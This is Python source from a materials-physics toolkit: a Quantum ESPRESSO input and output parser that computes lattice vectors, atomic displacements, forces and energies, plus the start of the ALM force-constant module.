self._disp_conversion_factor = 1.0 / self._BOHR_TO_ANGSTROM
self._energy_conversion_factor = 1.0 / self._RYDBERG_TO_EV
elif str_unit == "hartree":
self._disp_conversion_factor = 1.0 / self._BOHR_TO_ANGSTROM
self._energy_conversion_factor = 0.5 / self._RYDBERG_TO_EV
else:
raise RuntimeError("This cannot happen")
self._force_conversion_factor \
= self._energy_conversion_factor / self._disp_conversion_factor
def _set_output_flags(self, output_flags):
self._print_disp, self._print_force, \
self._print_energy, self._print_born = output_flags
def _set_number_of_zerofill(self, npattern):
nzero = 1
while True:
npattern //= 10
if npattern == 0:
break
nzero += 1
self._nzerofills = nzero
@property
def nat(self):
return self._nat
@property
def lattice_vector(self):
return self._lattice_vector
@property
def inverse_lattice_vector(self):
return self._inverse_lattice_vector
@property
def atomic_kinds(self):
return self._kd
@property
def x_fractional(self):
return self._x_fractional
@staticmethod
def _get_coordinate_and_force_lammps(lammps_dump_file):
add_flag = False
ret = []
with open(lammps_dump_file) as f:
for line in f:
if "ITEM:" in line and "ITEM: ATOMS id xu yu zu fx fy fz" not in line:
add_flag = False
continue
elif "ITEM: ATOMS id xu yu zu fx fy fz" in line:
add_flag = True
continue
if add_flag:
if line.strip():
entries = line.strip().split()
data_atom = [int(entries[0]),
[float(t) for t in entries[1:4]],
[float(t) for t in entries[4:]]]
ret.append(data_atom)
# This sort is necessary since the order atoms of LAMMPS dump files
# may change from the input structure file.
ret_sorted = sorted(ret)
ret_x = []
ret_f = []
for ret_atom in ret_sorted:
ret_x.extend(ret_atom[1])
ret_f.extend(ret_atom[2])
return np.array(ret_x), np.array(ret_f)
```
#### File: tools/interface/QE.py
```python
from __future__ import print_function
import numpy as np
import math
import copy
import sys
class QEParser(object):
def __init__(self):
self._prefix = None
self._lattice_vector = None
self._inverse_lattice_vector = None
self._nat = 0
self._x_fractional = None
self._kd = None
self._kdname = None
self._counter = 1
self._nzerofills = 0
self._disp_conversion_factor = 1.0
self._energy_conversion_factor = 1.0
self._force_conversion_factor = 1.0
self._initial_structure_loaded = False
self._print_disp = True
self._print_force = True
self._print_energy = False
self._print_born = False
self._list_CONTROL = []
self._list_SYSTEM = []
self._list_ELECTRONS = []
self._list_ATOMIC_SPECIES = []
self._list_ATOMIC_POSITIONS = []
self._list_K_POINTS = []
self._list_CELL_PARAMETERS = []
self._list_OCCUPATIONS = []
self._celldm = [None] * 6
self._BOHR_TO_ANGSTROM = 0.5291772108
self._RYDBERG_TO_EV = 13.60569253
def load_initial_structure(self, file_in):
# Parse fortran namelists
self._list_CONTROL = self._get_namelist(file_in, "&CONTROL")
self._list_SYSTEM = self._get_namelist(file_in, "&SYSTEM")
self._list_ELECTRONS = self._get_namelist(file_in, "&ELECTRONS")
# Parse general options
tags = ["ATOMIC_SPECIES", "ATOMIC_POSITIONS", "K_POINTS",
"CELL_PARAMETERS", "OCCUPATIONS", "CONSTRAINTS", "ATOMIC_FORCES"]
self._list_ATOMIC_SPECIES = self._get_options("ATOMIC_SPECIES", tags, file_in)
self._list_ATOMIC_POSITIONS = self._get_options("ATOMIC_POSITIONS", tags, file_in)
self._list_K_POINTS = self._get_options("K_POINTS", tags, file_in)
self._list_CELL_PARAMETERS = self._get_options("CELL_PARAMETERS", tags, file_in)
self._list_OCCUPATIONS = self._get_options("OCCUPATIONS", tags, file_in)
# Set lattice vectors and fractional coordinates
self._set_system_info()
self._initial_structure_loaded = True
def generate_structures(self, prefix, header_list, disp_list):
self._set_number_of_zerofill(len(disp_list))
self._prefix = prefix
self._counter = 1
for header, disp in zip(header_list, disp_list):
self._generate_input(header, disp)
def parse(self, initial_pwin, pwout_files, pwout_file_offset, str_unit,
output_flags, filter_emin=None, filter_emax=None):
if not self._initial_structure_loaded:
self.load_initial_structure(initial_pwin)
self._set_unit_conversion_factor(str_unit)
self._set_output_flags(output_flags)
if self._print_disp or self._print_force:
self._print_displacements_and_forces(pwout_files,
pwout_file_offset,
filter_emin,
filter_emax)
elif self._print_energy:
self._print_energies(pwout_files, pwout_file_offset)
elif self._print_born:
self._print_borninfo(pwout_files)
def get_displacements(self, pwout_files, unit="bohr"):
if not self._initial_structure_loaded:
raise RuntimeError("Please call load_initial_structure before using this method")
x0 = np.round(self._x_fractional, 8)
lavec_transpose = self._lattice_vector.transpose()
vec_refold = np.vectorize(self._refold)
disp_merged = []
if unit == "bohr":
unit_factor = 1.0 / self._BOHR_TO_ANGSTROM
elif unit == "angstrom":
unit_factor = 1.0
else:
raise RuntimeError("Invalid unit type. Valid values are 'bohr' and 'angstrom'.")
for search_target in pwout_files:
x = self._get_coordinates_pwout(search_target)
ndata, _, _ = np.shape(x)
disp = np.zeros((ndata, self._nat, 3))
for idata in range(ndata):
disp[idata, :, :] = x[idata, :, :] - x0
disp[idata, :, :] = np.dot(vec_refold(disp[idata, :, :]), lavec_transpose)
disp[idata, :, :] *= unit_factor
disp_merged.extend(disp)
return disp_merged
def _generate_input(self, header, disp):
filename = self._prefix + str(self._counter).zfill(self._nzerofills) + ".pw.in"
with open(filename, 'w') as f:
for entry in self._list_CONTROL:
f.write(entry)
for entry in self._list_SYSTEM:
f.write(entry)
for entry in self._list_ELECTRONS:
f.write(entry)
for entry in self._list_ATOMIC_SPECIES:
f.write(entry)
f.write("ATOMIC_POSITIONS crystal\n")
for i in range(self._nat):
f.write("%s %20.15f %20.15f %20.15f\n" % (self._kdname[self._kd[i]],
self._x_fractional[i][0] + disp[i, 0],
self._x_fractional[i][1] + disp[i, 1],
self._x_fractional[i][2] + disp[i, 2]))
for entry in self._list_K_POINTS:
f.write(entry)
for entry in self._list_CELL_PARAMETERS:
f.write(entry)
for entry in self._list_OCCUPATIONS:
f.write(entry)
f.write("\n")
self._counter += 1
def _print_displacements_and_forces(self, pwout_files,
file_offset, filter_emin, filter_emax):
x0 = np.round(self._x_fractional, 8)
lavec_transpose = self._lattice_vector.transpose() / self._BOHR_TO_ANGSTROM
vec_refold = np.vectorize(self._refold)
# Parse offset component
if file_offset is None:
disp_offset = np.zeros((1, self._nat, 3))
force_offset = np.zeros((self._nat, 3))
epot_offset = 0.0
else:
x_offset = self._get_coordinates_pwout(file_offset)
if x_offset is None:
raise RuntimeError("File %s does not contain position entry" % file_offset)
ndata_offset, _, _ = np.shape(x_offset)
if ndata_offset > 1:
raise RuntimeError("File %s contains too many position entries" % file_offset)
disp_offset = x_offset - x0
force_offset = self._get_atomicforces_pwout(file_offset)
if force_offset is None:
raise RuntimeError("File %s does not contain force entry" % file_offset)
try:
force_offset = np.reshape(force_offset, (self._nat, 3))
except:
raise RuntimeError("File %s contains too many force entries" % file_offset)
epot_offset = self._get_energies_pwout(file_offset)
if epot_offset is None:
raise RuntimeError("File %s does not contain energy entry" % file_offset)
epot_offset = np.array(epot_offset, dtype=np.float)
if len(epot_offset) > 1:
raise RuntimeError("File %s contains too many energy entries" % file_offset)
for search_target in pwout_files:
x = self._get_coordinates_pwout(search_target)
force = self._get_atomicforces_pwout(search_target)
epot = self._get_energies_pwout(search_target)
if x is None or force is None or epot is None:
continue
num_data_force = len(force) // (3 * self._nat)
force = np.reshape(force, (num_data_force, self._nat, 3))
num_data_disp, _, _ = np.shape(x)
if num_data_disp != num_data_force and self._print_disp and self._print_force:
print(
"Error: The number of entries of displacement and force is inconsistent.")
print("Ndata disp : %d, Ndata force : %d" %
(num_data_disp, num_data_force))
exit(1)
ndata_energy = len(epot)
if ndata_energy != num_data_disp:
raise RuntimeError("The numbers of displacement and energy entries are different.")
epot = np.array(epot, dtype=np.float)
epot -= epot_offset
epot *= self._RYDBERG_TO_EV
for idata in range(num_data_disp):
if filter_emin is not None:
if filter_emin > epot[idata]:
continue
if filter_emax is not None:
if filter_emax < epot[idata]:
continue
if self._print_disp:
disp = x[idata, :, :] - x0 - disp_offset
disp = np.dot(vec_refold(disp[0, :, :]), lavec_transpose)
disp *= self._disp_conversion_factor
if self._print_force:
f = force[idata, :, :] - force_offset
f *= self._force_conversion_factor
print("# Filename: %s, Snapshot: %d, E_pot (eV): %s" %
(search_target, idata + 1, epot[idata]))
if self._print_disp and self._print_force:
for i in range(self._nat):
print("%15.7F %15.7F %15.7F %20.8E %15.8E %15.8E" % (disp[i, 0],
disp[i, 1],
disp[i, 2],
f[i, 0],
f[i, 1],
f[i, 2]))
elif self._print_disp:
for i in range(self._nat):
print("%15.7F %15.7F %15.7F" % (disp[i, 0],
disp[i, 1],
disp[i, 2]))
elif self._print_force:
for i in range(self._nat):
print("%15.8E %15.8E %15.8E" % (f[i, 0],
f[i, 1],
f[i, 2]))
def _print_energies(self, pwout_files, file_offset):
if file_offset is None:
etot_offset = 0.0
else:
data = self._get_energies_pwout(file_offset)
if data is None:
raise RuntimeError("File %s does not contain energy entry" % file_offset)
if len(data) > 1:
raise RuntimeError("File %s contains too many energy entries" % file_offset)
etot_offset = data[0]
print("# Etot")
for search_target in pwout_files:
etot = self._get_energies_pwout(search_target)
if etot is None:
continue
for idata in range(len(etot)):
val = etot[idata] - etot_offset
val *= self._energy_conversion_factor
print("%19.11E" % val)
def _print_borninfo(self, phout_files):
for search_target in phout_files:
dielec, borncharge = self._get_borninfo_phout(search_target)
nat_prim, _, _ = np.shape(borncharge)
for i in range(3):
print("%16.8F %16.8F %16.8F" %
(dielec[i, 0], dielec[i, 1], dielec[i, 2]))
for j in range(nat_prim):
for i in range(3):
print("%16.8F %16.8F %16.8F" % (borncharge[j, i, 0],
borncharge[j, i, 1],
borncharge[j, i, 2]))
def _set_system_info(self):
list_mod = []
for obj in self._list_SYSTEM:
obj_split = obj.rstrip().split(',')
for subobj in obj_split:
if subobj:
index = subobj.find('=')
if index > 0:
subobj = subobj[:index] + " = " + subobj[index + 1:]
list_mod.append(subobj)
str_input = ""
for entry in list_mod:
str_input += entry + " "
entrylist = str_input.split()
for i in range(len(entrylist)):
if "ibrav" in entrylist[i]:
ibrav = int(entrylist[i + 2])
if "nat" in entrylist[i]:
self._nat = int(entrylist[i + 2])
if "ntyp" in entrylist[i]:
ntyp = int(entrylist[i + 2])
if "celldm(1)" in entrylist[i]:
# Do not assign the value if the comment character '!'
# appears in front of the celldm(1) keyword
has_comment = False
for elem in self._list_SYSTEM:
if "celldm(1)" in elem:
has_comment = ('!' == elem.strip().split()[0][0])
if not has_comment:
self._celldm[0] = float(entrylist[i + 2])
if "celldm(2)" in entrylist[i]:
self._celldm[1] = float(entrylist[i + 2])
if "celldm(3)" in entrylist[i]:
self._celldm[2] = float(entrylist[i + 2])
if "celldm(4)" in entrylist[i]:
self._celldm[3] = float(entrylist[i + 2])
if "celldm(5)" in entrylist[i]:
self._celldm[4] = float(entrylist[i + 2])
if "celldm(6)" in entrylist[i]:
self._celldm[5] = float(entrylist[i + 2])
self._set_lattice_vector(ibrav)
self._set_fractional_coordinate()
def _set_lattice_vector(self, ibrav):
""".
Computer lattice vector in units of Angstrom for given ibrav and celldm.
Doc/INPUT_PW.txt was used as a reference.
"""
lavec = np.zeros((3, 3))
if ibrav == 0:
if self._list_CELL_PARAMETERS is None:
raise RuntimeError("CELL_PARAMETERS must be given when ibrav = 0.")
mode = self._list_CELL_PARAMETERS[0].rstrip().split()
if len(mode) == 1:
raise RuntimeError(
"Error : Please specify either alat, bohr, or angstrom for CELL_PARAMETERS")
mode_str = mode[1].lower()
for i in range(3):
lavec[i][:] = [float(entry) for entry in
self._list_CELL_PARAMETERS[i + 1].rstrip().split()]
lavec = np.array(lavec)
if "alat" in mode_str:
if not self._celldm[0]:
raise RuntimeError(
"celldm(1) must be given when 'alat' is used for CELL_PARAMETERS")
for i in range(3):
for j in range(3):
lavec[i][j] *= self._celldm[0]
elif "angstrom" in mode_str:
# convert the lattice vectors in Bohr unit here to make them back to
# the angstrom unit at the end of this method.
for i in range(3):
for j in range(3):
lavec[i][j] /= self._BOHR_TO_ANGSTROM
elif "bohr" not in mode_str:
raise RuntimeError("Error : Invalid option for CELL_PARAMETERS: %s" %
mode[1])
elif ibrav == 1:
if not self._celldm[0]:
raise RuntimeError("celldm(1) must be given when ibrav = 1.")
else:
a = self._celldm[0]
lavec = np.array([[a, 0.0, 0.0],
[0.0, a, 0.0],
[0.0, 0.0, a]])
elif ibrav == 2:
if not self._celldm[0]:
raise RuntimeError("celldm(1) must be given when ibrav = 2.")
else:
a = self._celldm[0] / 2.0
lavec = np.array([[-a, 0.0, a],
[0.0, a, a],
[-a, a, 0.0]])
elif ibrav == 3:
if not self._celldm[0]:
raise RuntimeError("celldm(1) must be given when ibrav = 3.")
else:
a = self._celldm[0] / 2.0
lavec = np.array([[a, a, a],
[-a, a, a],
[-a, -a, a]])
elif ibrav == 4:
if not self._celldm[0] or not self._celldm[2]:
raise RuntimeError("celldm(1) and celldm(3) must be given when ibrav = 4.")
else:
a = self._celldm[0]
c = self._celldm[0] * self._celldm[2]
lavec = np.array([[a, 0.0, 0.0],
[-0.5 * a, math.sqrt(3.) / 2.0 * a, 0.0],
[0.0, 0.0, c]])
elif ibrav == 5 or ibrav == -5:
if not self._celldm[0] or not self._celldm[3]:
raise RuntimeError("celldm(1) and celldm(4) must be given when ibrav = 5, -5.")
else:
a = self._celldm[0]
cosalpha = self._celldm[3]
tx = a * math.sqrt((1.0 - cosalpha) / 2.)
ty = a * math.sqrt((1.0 - cosalpha) / 6.)
tz = a * math.sqrt((1.0 + 2.0 * cosalpha) / 3.)
if ibrav == 5:
lavec = np.array([[tx, -ty, tz],
[0.0, 2.0 * ty, tz],
[-tx, -ty, tz]])
else:
a_prime = a / math.sqrt(3.0)
u = tz - 2.0 * math.sqrt(2.0) * ty
v = tz + math.sqrt(2.0) * ty
u *= a_prime
v *= a_prime
lavec = np.array([[u, v, v],
[v, u, v],
[v, v, u]])
elif ibrav == 6:
if not self._celldm[0] or not self._celldm[2]:
raise RuntimeError("celldm(1) and celldm(3) must be given when ibrav = 6.")
else:
a = self._celldm[0]
c = self._celldm[0] * self._celldm[2]
lavec = np.array([[a, 0.0, 0.0],
[0.0, a, 0.0],
[0.0, 0.0, c]])
elif ibrav == 7:
if not self._celldm[0] or not self._celldm[2]:
raise RuntimeError("celldm(1) and celldm(3) must be given when ibrav = 7.")
else:
a = self._celldm[0]
c = self._celldm[0] * self._celldm[2]
lavec = np.array([[a / 2.0, -a / 2.0, c / 2.0],
[a / 2.0, a / 2.0, c / 2.0],
[-a / 2.0, -a / 2.0, c / 2.0]])
elif ibrav == 8:
if not self._celldm[0] or not self._celldm[1] or not self._celldm[2]:
raise RuntimeError("celldm(1), celldm(2), and celldm(3) must be given\
when ibrav = 8.")
else:
a = self._celldm[0]
b = self._celldm[0] * self._celldm[1]
c = self._celldm[0] * self._celldm[2]
lavec = np.array([[a, 0.0, 0.0],
[0.0, b, 0.0],
[0.0, 0.0, c]])
elif ibrav == 9 or ibrav == -9:
if not self._celldm[0] or not self._celldm[1] or not self._celldm[2]:
raise RuntimeError("celldm(1), celldm(2), and celldm(3) must be given\
when ibrav = 9 or -9.")
else:
a = self._celldm[0]
b = self._celldm[0] * self._celldm[1]
c = self._celldm[0] * self._celldm[2]
if ibrav == 9:
lavec = np.array([[a / 2., b / 2., 0.0],
[-a / 2., b / 2., 0.0],
[0.0, 0.0, c]])
else:
lavec = np.array([[a / 2., -b / 2., 0.0],
[a / 2., b / 2., 0.0],
[0.0, 0.0, c]])
elif ibrav == 10:
if not self._celldm[0] or not self._celldm[1] or not self._celldm[2]:
raise RuntimeError("celldm(1), celldm(2), and celldm(3) must be given\
when ibrav = 10.")
else:
a = self._celldm[0] / 2.0
b = self._celldm[0] * self._celldm[1] / 2.0
c = self._celldm[0] * self._celldm[2] / 2.0
lavec = np.array([[a, 0.0, c],
[a, b, 0.0],
[0.0, b, c]])
elif ibrav == 11:
if not self._celldm[0] or not self._celldm[1] or not self._celldm[2]:
raise RuntimeError("celldm(1), celldm(2), and celldm(3) must be given\
when ibrav = 11.")
else:
a = self._celldm[0] / 2.0
b = self._celldm[0] * self._celldm[1] / 2.0
c = self._celldm[0] * self._celldm[2] / 2.0
lavec = np.array([[a, b, c],
[-a, b, c],
[-a, -b, c]])
elif ibrav == 12:
if not self._celldm[0] or not self._celldm[1] or not self._celldm[2] or \
not self._celldm[3]:
raise RuntimeError("celldm(1), celldm(2), celldm(3), and celldm(4)\
must be given when ibrav = 12.")
else:
a = self._celldm[0]
b = self._celldm[0] * self._celldm[1]
c = self._celldm[0] * self._celldm[2]
gamma = math.acos(self._celldm[3])
lavec = np.array([[a, 0.0, 0.0],
[b * math.cos(gamma), b * math.sin(gamma), 0.0],
[0.0, 0.0, c]])
elif ibrav == -12:
if not self._celldm[0] or not self._celldm[1] or not self._celldm[2] or \
not self._celldm[4]:
raise RuntimeError("celldm(1), celldm(2), celldm(3), and celldm(5)\
must be given when ibrav = -12.")
else:
a = self._celldm[0]
b = self._celldm[0] * self._celldm[1]
c = self._celldm[0] * self._celldm[2]
beta = math.acos(self._celldm[4])
lavec = np.array([[a, 0.0, 0.0],
[0.0, b, 0.0],
[c * math.cos(beta), 0.0, c * math.sin(beta)]])
elif ibrav == 13:
if not self._celldm[0] or not self._celldm[1] or not self._celldm[2] or \
not self._celldm[3]:
raise RuntimeError("celldm(1), celldm(2), celldm(3), and celldm(4)\
must be given when ibrav = 13.")
else:
a = self._celldm[0]
b = self._celldm[0] * self._celldm[1]
c = self._celldm[0] * self._celldm[2]
gamma = math.acos(self._celldm[3])
lavec = np.array([[a / 2.0, 0.0, -c / 2.0],
[b * math.cos(gamma), b * math.sin(gamma), 0.0],
[a / 2.0, 0.0, c / 2.0]])
elif ibrav == 14:
if not self._celldm[0] or not self._celldm[1] or not self._celldm[2] or \
not self._celldm[3] or not self._celldm[4] or not self._celldm[5]:
raise RuntimeError("All celldm must be given when ibrav = 14.")
else:
a = self._celldm[0]
b = self._celldm[0] * self._celldm[1]
c = self._celldm[0] * self._celldm[2]
alpha = math.acos(self._celldm[3])
beta = math.acos(self._celldm[4])
gamma = math.acos(self._celldm[5])
lavec = np.array([[a, 0.0, 0.0],
[b * math.cos(gamma), b * math.sin(gamma), 0.0],
[c * math.cos(beta),
c * (math.cos(alpha) - math.cos(beta) *
math.cos(gamma)) / math.sin(gamma),
c * math.sqrt(1.0 + 2.0 * math.cos(alpha) * math.cos(beta) * math.cos(gamma)
- math.cos(alpha) ** 2 - math.cos(beta) ** 2 - math.cos(
gamma) ** 2) / math.sin(gamma)]])
else:
raise RuntimeError("Invalid ibrav = %s" % ibrav)
# if celldm(1) is empty, calculate it from the lattice vector for later use.
if not self._celldm[0]:
self._celldm[0] = math.sqrt(np.dot(lavec[0][:], lavec[0][:]))
# Transpose for later use
lavec = lavec.transpose()
# Convert to Angstrom unit
for i in range(3):
for j in range(3):
lavec[i][j] *= self._BOHR_TO_ANGSTROM
self._lattice_vector = lavec
self._inverse_lattice_vector = np.linalg.inv(lavec)
def _set_fractional_coordinate(self):
list_tmp = self._list_ATOMIC_POSITIONS[0].rstrip().split()
if len(list_tmp) == 1:
raise RuntimeError("Error : Please specify either alat, "
" bohr, angstrom, or crystal for ATOMIC_POSITIONS")
mode_str = list_tmp[1].lower()
if "crystal_sg" in mode_str:
raise RuntimeError(
"Error : Sorry. 'crystal_sg' is not supported in this script. "
"Please use another option.")
xtmp = np.zeros((self._nat, 3))
kd = []
for i in range(self._nat):
list_tmp = self._list_ATOMIC_POSITIONS[i + 1].rstrip().split()
kd.append(list_tmp[0])
xtmp[i][:] = [float(j) for j in list_tmp[1:4]]
# lattice_vector is in units of Angstrom, so the unit of aa_inv is (Angstrom)^-1
aa_inv = copy.deepcopy(self._inverse_lattice_vector)
if "alat" in mode_str:
# atomic positions are in cartesian coordinates in units of the lattice parameter (celldim(1))
a_angstrom = self._celldm[0] * self._BOHR_TO_ANGSTROM
for i in range(3):
for j in range(3):
aa_inv[i][j] *= a_angstrom
for i in range(self._nat):
xtmp[i][:] = np.dot(xtmp[i][:], aa_inv.transpose())
elif "bohr" in mode_str:
for i in range(3):
for j in range(3):
aa_inv[i][j] *= self._BOHR_TO_ANGSTROM
for i in range(self._nat):
xtmp[i][:] = np.dot(xtmp[i][:], aa_inv.transpose())
elif "angstrom" in mode_str:
for i in range(self._nat):
xtmp[i][:] = np.dot(xtmp[i][:], aa_inv.transpose())
elif "crystal" not in mode_str:
raise RuntimeError("Error : Invalid option for ATOMIC_POSITIONS: %s" % mode_str)
kdname = []
for entry in kd:
if entry not in kdname:
kdname.append(entry)
dict_kd = {}
counter = 0
for name in kdname:
dict_kd[name] = counter
counter += 1
kd_int = []
for entry in kd:
kd_int.append(dict_kd[entry])
self._kd = kd_int
self._kdname = kdname
self._x_fractional = xtmp
def _set_number_of_zerofill(self, npattern):
nzero = 1
while True:
npattern //= 10
if npattern == 0:
break
nzero += 1
self._nzerofills = nzero
def _set_unit_conversion_factor(self, str_unit):
if str_unit == "ev":
self._disp_conversion_factor = self._BOHR_TO_ANGSTROM
self._energy_conversion_factor = self._RYDBERG_TO_EV
elif str_unit == "rydberg":
self._disp_conversion_factor = 1.0
self._energy_conversion_factor = 1.0
elif str_unit == "hartree":
self._disp_conversion_factor = 1.0
self._energy_conversion_factor = 0.5
else:
raise RuntimeError("This cannot happen.")
self._force_conversion_factor = self._energy_conversion_factor / self._disp_conversion_factor
def _set_output_flags(self, output_flags):
self._print_disp, self._print_force, \
self._print_energy, self._print_born = output_flags
@property
def nat(self):
return self._nat
@nat.setter
def nat(self, nat):
self._nat = nat
@property
def lattice_vector(self):
return self._lattice_vector
@lattice_vector.setter
def lattice_vector(self, lattice_vector):
self._lattice_vector = lattice_vector
self._inverse_lattice_vector = np.linalg.inv(lattice_vector)
@property
def inverse_lattice_vector(self):
return self._inverse_lattice_vector
@property
def kd(self):
return self._kd
@property
def kd_in_str(self):
return [self._kdname[i] for i in self._kd]
@kd.setter
def kd(self, kd):
self._kd = kd
@kd_in_str.setter
def kd_in_str(self, kd_in_str):
map_name2num = {}
for i, name in enumerate(self._kdname):
map_name2num[name] = i
self._kd = [map_name2num[t] for t in kd_in_str]
@property
def atomic_kinds(self):
return self._kd
@property
def x_fractional(self):
return self._x_fractional
@x_fractional.setter
def x_fractional(self, x_fractional):
self._x_fractional = x_fractional
@property
def list_system(self):
return self._list_SYSTEM
@list_system.setter
def list_system(self, list_in):
self._list_SYSTEM = list_in
@property
def list_cell_parameters(self):
return self._list_CELL_PARAMETERS
@list_cell_parameters.setter
def list_cell_parameters(self, list_in):
self._list_CELL_PARAMETERS = list_in
@property
def list_k_points(self):
return self._list_K_POINTS
@list_k_points.setter
def list_k_points(self, list_in):
self._list_K_POINTS = list_in
@staticmethod
def _get_namelist(file_in, namelist_tag):
list_out = []
flag_add = False
with open(file_in) as openfileobject:
for line in openfileobject:
line_upper = line.upper()
if namelist_tag in line_upper:
flag_add = True
list_out.append(line)
elif line.strip() == "/":
flag_add = False
elif flag_add:
list_out.append(line)
if len(list_out) == 0:
print("%s field not found" % namelist_tag)
exit(1)
list_out.append("/\n")
return list_out
@staticmethod
def _get_options(option_tag, taglists, file_in):
list_out = []
flag_add = False
with open(file_in) as openfileobject:
for line in openfileobject:
if option_tag in line:
flag_add = True
list_out.append(line)
elif len(line.split()) > 0 and line.split()[0] in taglists:
flag_add = False
elif flag_add:
if line.strip():
list_out.append(line)
return list_out
@staticmethod
def _refold(x):
if x >= 0.5:
return x - 1.0
elif x < -0.5:
return x + 1.0
else:
return x
def _get_coordinates_pwout(self, pwout_file):
"""
Return the fractional coordinates of atoms
"""
search_flag = "site n. atom positions (alat units)"
x = np.zeros((self._nat, 3))
num_data_disp_extra = 0
basis = ""
found_tag = False
f = open(pwout_file, 'r')
line = f.readline()
while line:
if search_flag in line:
found_tag = True
for i in range(self._nat):
line = f.readline()
x[i][:] = [float(t) for t in line.rstrip().split()[6:9]]
break
line = f.readline()
if not found_tag:
#print("%s tag not found in %s" % (search_flag, pwout_file), file=sys.stderr)
return None
x = self._celldm[0] * np.dot(x, self._inverse_lattice_vector.transpose()) \
* self._BOHR_TO_ANGSTROM
# Search additional entries containing atomic position
# (for parsing MD trajectory)
search_flag2 = "ATOMIC_POSITIONS "
x_additional = []
while line:
if search_flag2 in line:
if not basis:
basis = line.rstrip().split()[1]
num_data_disp_extra += 1
for i in range(self._nat):
line = f.readline()
x_additional.extend([t for t in line.rstrip().split()[1:4]])
line = f.readline()
f.close()
x_additional = np.array(x_additional, dtype=np.float)
# The basis of the coordinate in x_additional can be different
# from that of x. Therefore, perform basis conversion here.
if num_data_disp_extra > 0:
if "alat" in basis:
conversion_mat = self._celldm[0] \
* self._inverse_lattice_vector.transpose() \
* self._BOHR_TO_ANGSTROM
elif "bohr" in basis:
conversion_mat = self._inverse_lattice_vector.transpose \
* self._BOHR_TO_ANGSTROM
elif "angstrom" in basis:
conversion_mat = self._inverse_lattice_vector.transpose()
elif "crystal" in basis:
conversion_mat = np.identity(3)
else:
raise RuntimeError("This cannot happen.")
x_additional = np.reshape(x_additional, (num_data_disp_extra, self._nat, 3))
for i in range(num_data_disp_extra):
x_additional[i, :, :] \
= np.dot(x_additional[i, :, :], conversion_mat)
if num_data_disp_extra <= 1:
return np.reshape(x, (1, self._nat, 3))
else:
x_merged = np.zeros((num_data_disp_extra, self._nat, 3))
x_merged[0, :, :] = x[:, :]
x_merged[1:, :, :] = x_additional[:-1, :, :]
return x_merged
def _get_atomicforces_pwout(self, pwout_file):
search_tag = "Forces acting on atoms (Ry/au):"
search_tag_QE6 = "Forces acting on atoms (cartesian axes, Ry/au):"
found_tag = False
f = open(pwout_file, 'r')
line = f.readline()
force = []
while line:
if search_tag in line or search_tag_QE6 in line:
found_tag = True
f.readline()
for i in range(self._nat):
line = f.readline()
force.extend([t for t in line.rstrip().split()[6:9]])
line = f.readline()
f.close()
if not found_tag:
print("following search tags not found in %s" % pwout_file, file=sys.stderr)
print(search_tag, file=sys.stderr)
print(search_tag_QE6, file=sys.stderr)
return None
return np.array(force, dtype=np.float)
@staticmethod
def _get_energies_pwout(pwout_file):
search_tag = "! total energy"
found_tag = False
etot = []
with open(pwout_file) as openfileobject:
for line in openfileobject:
if search_tag in line:
etot.extend([line.rstrip().split()[4]])
found_tag = True
if not found_tag:
print("%s tag not found in %s" % (search_tag, pwout_file), file=sys.stderr)
return None
return np.array(etot, dtype=np.float)
@staticmethod
def _get_borninfo_phout(phout_file):
dielec = []
borncharge = []
search_tag1 = "Dielectric constant in cartesian axis"
f = open(phout_file, 'r')
line = f.readline()
found_tag1 = False
found_tag2 = False
while line:
if search_tag1 in line:
found_tag1 = True
f.readline()
for i in range(3):
line = f.readline()
dielec.extend([float(t) for t in line.strip().split()[1:4]])
if "Px" in line or "Py" in line or "Pz" in line:
found_tag2 = True
borncharge.extend(float(t) for t in line.strip().split()[2:5])
line = f.readline()
f.close()
if not found_tag1 or not found_tag2:
print("Dielectric constants or Born effective charges are not found"
"in %s" % phout_file, file=sys.stderr)
return None
nat = len(borncharge) // 9
dielec = np.reshape(np.array(dielec[9:]), (3, 3))
borncharge = np.reshape(np.array(borncharge), (nat, 3, 3))
return dielec, borncharge
``` |
{
"source": "jochym/ALM",
"score": 2
} |
#### File: python/alm/alm.py
```python
import warnings
from collections import OrderedDict
import numpy as np
from . import _alm as alm
atom_names = ("X", "H", "He", "Li", "Be", "B", "C", "N", "O", "F",
"Ne", "Na", "Mg", "Al", "Si", "P", "S", "Cl", "Ar", "K",
"Ca", "Sc", "Ti", "V", "Cr", "Mn", "Fe", "Co", "Ni", "Cu",
"Zn", "Ga", "Ge", "As", "Se", "Br", "Kr", "Rb", "Sr", "Y",
"Zr", "Nb", "Mo", "Tc", "Ru", "Rh", "Pd", "Ag", "Cd", "In",
"Sn", "Sb", "Te", "I", "Xe", "Cs", "Ba", "La", "Ce", "Pr",
"Nd", "Pm", "Sm", "Eu", "Gd", "Tb", "Dy", "Ho", "Er", "Tm",
"Yb", "Lu", "Hf", "Ta", "W", "Re", "Os", "Ir", "Pt", "Au",
"Hg", "Tl", "Pb", "Bi", "Po", "At", "Rn", "Fr", "Ra", "Ac",
"Th", "Pa", "U", "Np", "Pu", "Am", "Cm", "Bk", "Cf", "Es",
"Fm", "Md", "No", "Lr", "Rf", "Db", "Sg", "Bh", "Hs", "Mt",
"Ds", "Rg", "Cn", "Uut", "Uuq", "Uup", "Uuh", "Uus", "Uuo")
# From src/optimize.h
# {sparsefolver: str} is omitted because this is set at ALM.optimize.
# This order is not allowed to change because it is explicitly used in _alm.c.
optimizer_control_data_types = OrderedDict([
('linear_model', int),
('use_sparse_solver', int),
('maxnum_iteration', int),
('tolerance_iteration', float),
('output_frequency', int),
('standardize', int),
('displacement_normalization_factor', float),
('debiase_after_l1opt', int),
('cross_validation', int),
('l1_alpha', float),
('l1_alpha_min', float),
('l1_alpha_max', float),
('num_l1_alpha', int),
('l1_ratio', float),
('save_solution_path', int)])
class ALM(object):
"""Calculate harmonic and anharmonic interatomic force constants
Attributes
----------
lavec : ndarray
Basis vectors. a, b, c are given as row vectors.
shape=(3, 3), dtype='double'
xcoord : ndarray
Fractional coordinates of atomic points.
shape=(num_atoms, 3), dtype='double'
numbers : ndarray
Atomic numbers.
shape=(num_atoms,), dtype='intc'
kind_names : OrderedDict
Pairs of (atomic number, element name). Since the atomic number is the
key of OrderedDict, only unique atomic numbers are stored and the
order of ``numbers`` is preserved in the keys of this OrderedDict.
displacements : ndarray
Displacements of atoms in supercells used as training data.
shape=(supercells, num_atoms, 3), dtype='double', order='C'
forces : ndarray
Forces of atoms in supercells used as training data.
shape=(supercells, num_atoms, 3), dtype='double', order='C'
verbosity : int
Level of the output frequency either 0 (no output) or
1 (normal output). Default is 0.
output_filename_prefix : str
More detailed logs are stored in files when this is given. This string
is used to the prefix of filenames of logs.
